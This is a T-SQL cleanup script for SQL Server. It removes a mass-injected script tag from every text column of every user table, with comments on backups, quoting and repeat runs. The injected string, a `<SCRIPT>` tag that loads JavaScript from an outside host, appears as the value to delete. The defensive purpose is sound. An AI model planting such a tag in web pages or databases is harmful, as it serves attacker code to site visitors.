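-- Strips one injected <script> string from every character column of every
-- user table in the current database (SQL Server / T-SQL).
--
-- Before running: take a full backup and try the script on a restored copy.
-- This only cleans stored data. The injection point that wrote the string
-- must be fixed separately, otherwise the rows will simply be modified again.
-- Each run removes the FIRST occurrence per value; re-run until the final
-- total printed is 0 if a value may contain the string more than once.

DECLARE @delstr NVARCHAR(500)
-- The injected string to remove. It must match the stored text exactly
-- (spacing included), so copy it from an affected row rather than retyping it.
-- LIKE / PATINDEX treat %, _ and [ inside this value as wildcards; the value
-- below contains none of them.
SET @delstr = '<SCRIPT src = http://www.kansm.com/js/common.js> </SCRIPT>'

SET NOCOUNT ON

DECLARE @tablename SYSNAME, @columnname SYSNAME, @tbid INT, @irow INT, @iresult INT
DECLARE @qtable NVARCHAR(258), @qcolumn NVARCHAR(258)
-- 4000 rather than 2000 so the generated statement cannot be silently truncated.
DECLARE @SQL NVARCHAR(4000)
SET @iresult = 0

-- Outer cursor: every user table (xtype 'U').
-- NOTE(review): names are used without a schema prefix, so tables outside the
-- caller's default schema will not resolve - confirm for your database.
DECLARE cur CURSOR FOR
    SELECT name, id FROM sysobjects WHERE xtype = 'U'
OPEN cur
FETCH NEXT FROM cur INTO @tablename, @tbid
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Inner cursor: character columns of the current table.
    -- 231 = nvarchar, 167 = varchar, 239 = nchar, 175 = char, 35 = text, 99 = ntext
    DECLARE cur1 CURSOR FOR
        SELECT name FROM syscolumns WHERE xtype IN (231, 167, 239, 175, 35, 99) AND id = @tbid
    OPEN cur1
    FETCH NEXT FROM cur1 INTO @columnname
    WHILE @@FETCH_STATUS = 0
    BEGIN
        -- QUOTENAME escapes any ] in the identifier, so a crafted table or
        -- column name cannot break out of the generated statement.
        SET @qtable = QUOTENAME(@tablename)
        SET @qcolumn = QUOTENAME(@columnname)

        -- New value = text before the first match + text after it.
        -- DATALENGTH (bytes) is only an upper bound meaning "to the end".
        -- @delstr is bound as a parameter, never concatenated into the SQL text.
        -- NOTE(review): for text/ntext columns, check on a copy that long
        -- values are not truncated by the SUBSTRING round trip.
        SET @SQL = N'UPDATE ' + @qtable
            + N' SET ' + @qcolumn + N' = '
            + N'SUBSTRING(' + @qcolumn + N', 1, PATINDEX(''%'' + @delstr + ''%'', ' + @qcolumn + N') - 1)'
            + N' + SUBSTRING(' + @qcolumn + N', PATINDEX(''%'' + @delstr + ''%'', ' + @qcolumn + N') + LEN(@delstr), DATALENGTH(' + @qcolumn + N'))'
            + N' WHERE ' + @qcolumn + N' LIKE ''%'' + @delstr + ''%'''

        EXEC sp_executesql @SQL, N'@delstr NVARCHAR(500)', @delstr = @delstr

        -- Must be read immediately after EXEC; any later statement resets it.
        SET @irow = @@ROWCOUNT
        SET @iresult = @iresult + @irow
        IF @irow > 0
        BEGIN
            PRINT 'table: ' + @tablename + ', column: ' + @columnname + ' updated ' + CONVERT(VARCHAR(10), @irow) + 'records ;'
        END
        FETCH NEXT FROM cur1 INTO @columnname
    END
    CLOSE cur1
    DEALLOCATE cur1
    -- This fetch also resets @@FETCH_STATUS, which the inner loop left at "no more rows".
    FETCH NEXT FROM cur INTO @tablename, @tbid
END
PRINT 'database total ' + CONVERT(VARCHAR(10), @iresult) + ' records updated !!! '
CLOSE cur
DEALLOCATE cur
SET NOCOUNT OFF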